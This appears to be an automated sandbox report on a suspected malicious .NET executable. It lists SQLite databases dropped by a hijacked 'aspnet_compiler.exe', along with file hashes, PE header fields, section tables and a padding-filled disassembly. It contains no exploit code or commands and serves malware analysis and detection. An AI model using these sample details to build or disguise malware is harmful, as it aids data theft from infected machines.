                                                            Preview:ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):49152
                                                            Entropy (8bit):0.7876734657715041
                                                            Encrypted:false
                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):49152
                                                            Entropy (8bit):0.7876734657715041
                                                            Encrypted:false
                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):49152
                                                            Entropy (8bit):0.7876734657715041
                                                            Encrypted:false
                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):49152
                                                            Entropy (8bit):0.7876734657715041
                                                            Encrypted:false
                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):49152
                                                            Entropy (8bit):0.7876734657715041
                                                            Encrypted:false
                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):49152
                                                            Entropy (8bit):0.7876734657715041
                                                            Encrypted:false
                                                            SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                            MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                            SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                            SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                            SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):5.433796373508295
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:StZAEFSb2j.exe
                                                            File size:43520
                                                            MD5:c71616e2b7cedf9fc8e2ca6f6929abdf
                                                            SHA1:896a4c41792c73db51074ccff5ef3f0577f510c5
                                                            SHA256:4a9f8a3b847fa9d2e854d3a7235ddee8e4c093d04c3901f006d430be1060fae5
                                                            SHA512:bcf06478805a8c0b047304989a76a9a6d5380b148524c12eb8e1e2acebead20bc42a969992a332b9ab33e6644ef2e0aaf4d1933f84cbcfccd2d86995310f58ef
                                                            SSDEEP:768:A5588dpB2Gaq7kvl4VPNznshp/xzVmzOMdcGMN75H16U8S4riXzjla:C58K97kuVPRn+/xJm65GMN7FMuBzjo
                                                            TLSH:9113B99D766072DFC85BC0729EA82C68EB60747B931B8243942715ADDE0DA97CF080F3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^cc..............0.................. ........@.. ....................................`................................
                                                            Icon Hash:00828e8e8686b000
                                                            Entrypoint:0x40bebe
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x63635E1E [Thu Nov 3 06:22:22 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbe700x4b.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x5a6.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xbe2c0x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x9ec40xa000False0.41630859375data5.4639881643435775IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
